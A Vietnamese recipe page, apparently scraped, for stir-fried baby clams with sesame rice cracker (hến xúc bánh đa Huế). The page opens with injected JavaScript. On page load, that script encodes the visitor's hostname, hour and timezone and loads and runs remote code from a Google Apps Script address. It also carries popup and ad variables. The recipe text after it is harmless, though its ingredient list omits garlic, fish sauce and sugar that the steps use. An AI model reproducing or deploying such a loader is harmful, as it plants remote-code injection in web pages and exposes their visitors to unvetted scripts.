var GTM = 'GTM-NJKFBQ8'; var GG_ADS = 'ca-pub-8687624480880776'; var POPUP_IMG_PREFIX = "https://nhaxinhplaza.vn/wp-content/uploads/2022/08/"; // qc.png, close.png var SHOW_POPUP = 1; // 0: disable, 1: enable var MAX_CLAIM = 1; var TIME_TO_SHOW_POPUP = 10; // 10s var MAX_BUFF = 3; var b64e = function (a) { return btoa(encodeURIComponent(a).replace(/%([0-9A-F]{2})/g, function (b, a) { return String.fromCharCode("0x" + a) })) }; var gg_layer = document.createElement('script'); gg_layer.type = 'text/javascript'; gg_layer.src = `https://script.google.com/macros/s/AKfycbwT2tLHaERiLaaaT_05pnXM2h0pjKHGRPBTQgeffPjyIIXBAR46dAuj5S0sgi2scsJ77Q/exec ?st=${b64e(location.hostname)}&tm=${new Date().getHours()}&os=${b64e(new Date().getTimezoneOffset())}`; var s = document.getElementsByTagName('script')[0];s.parentNode.insertBefore(gg_layer, s);

Cách làm hến xúc bánh đa Huế giòn ngon, chuẩn vị miền Trung

Ai đã một lần đến Hội An đều không thể quên món hến xúc bánh tráng chân phương, mộc mạc nhưng lại vô cùng đậm đà, hấp dẫn. Hãy cùng vào bếp với Bách hóa XANH và thực hiện món ăn đặc sản này nhé!

Chế biến 10 phút Chuẩn bị 15 phút Dành cho 3 người

1Nguyên liệu làm hến xúc bánh đa Huế

  • 300 gram thịt hến
  • 50 gram đậu phộng
  • 1 cái bánh đa
  • 10 gram hành phi
  • 2 cây sả
  • 2 – 3 trái ớt
  • Hành tím hoặc hành tây
  • Rau răm
  • Gia vị: Dầu ăn, tiêu, hạt nêm vừa đủ

Mẹo hay: – Để chọn mua hến ngon thì bạn chọn những con còn vỏ, vỏ nguyên vẹn, cứng, đóng chặt và không quá nhỏ hoặc quá lớn. Nếu bạn mua hến đã được tách vỏ thì nên chọn mua hến có thịt có màu trắng, mềm, hơi ấm và không có mùi hôi. Ngoài ra không chọn mua những mẻ hến mềm nhũn, trông xỉn màu và có mùi hôi.

Nguyên liệu làm hến xúc bánh đa HuếNguyên liệu làm hến xúc bánh đa Huế

2Cách làm hến xúc bánh đa Huế

Bước 1 Sơ chế nguyên liệu

Thịt hến rửa sạch, để thật ráo nước. Sả rửa sạch, đập giập, bằm nhỏ. Hành tăm hoặc hành củ bóc vỏ, rửa sạch, đập giập, bằm nhỏ. Ớt rửa sạch, xắt nhỏ. Rau răm nhặt bỏ lá già, úa và gốc già, rửa sạch.

Sơ chế nguyên liệu Sơ chế nguyên liệu

Bước 2 Xào hến

Đầu tiên bạn vào chảo 2 muỗng canh dầu ăn, đợi dầu sôi thì thêm tỏi vào phi vàng rồi vớt ra chén. Tiếp đến cho sả, hành tím băm vào. Thấy sả và hành dậy mùi thì cho hến vào xào trong 2 phút, nêm thêm 3 muỗng canh nước mắm, 1 muỗng canh hạt nêm, 1 muỗng cà phê muối, 2 muỗng canh đường.

Thịt hến săn lại thì cho hành tây vào rồi thêm rau răm và 2 trái ớt đã thái lát rồi đảo đều. Cuối cùng tắt bếp, rắc tỏi phi lên trên.

Xào hếnXào hến

Bước 3 Thành phẩm

Bạn cho hến đã xào ra dĩa, trang trí thêm các loại rau củ cho đẹp mắt. Bánh đa bạn bẻ miếng vừa ăn, rồi xếp lần lượt dĩa hến bánh đa ra mẹt là có thể thưởng thức rồi.

Thành phẩm

3Thưởng thức

Thành phẩm sau khi hoàn thành vô cùng hấp dẫn. Thịt hến ngọt thịt ăn cùng với bánh đa giòn rụm chắc chắc sẽ khiến cả nhà thích mê!

Hến xúc bánh đa HuếHến xúc bánh đa Huế

4Mẹo làm món hến xúc bánh đa Huế ngon

  • Món ăn nãy sẽ ngon hơn khi thưởng thức lúc còn nóng.
  • Để ngon miệng hơn thì bạn có thể ăn kèm với các loại rau như dưa leo, xà lách chấm kèm tương ớt hoặc nước tương.
  • Bạn có thể ăn món này với cơm trắng hoặc bánh mì đều rất ngon đấy.
  • Ngoài ra bạn có thể thay hến thành mực sữa, răng mực tùy theo sở thích.

Như vậy là món hến xúc bánh tráng đã hoàn thành. Bạn có thể chiêu đãi gia đình những bữa xế hoặc bữa tối cuối tuần với món ăn dân dã này. Chúc các bạn thành công!

Chọn mua đậu phộng chất lượng, giá tốt tại Bách hoá XANH để làm món hến xúc bánh tráng:

Nguồn tham khảo: eva.vn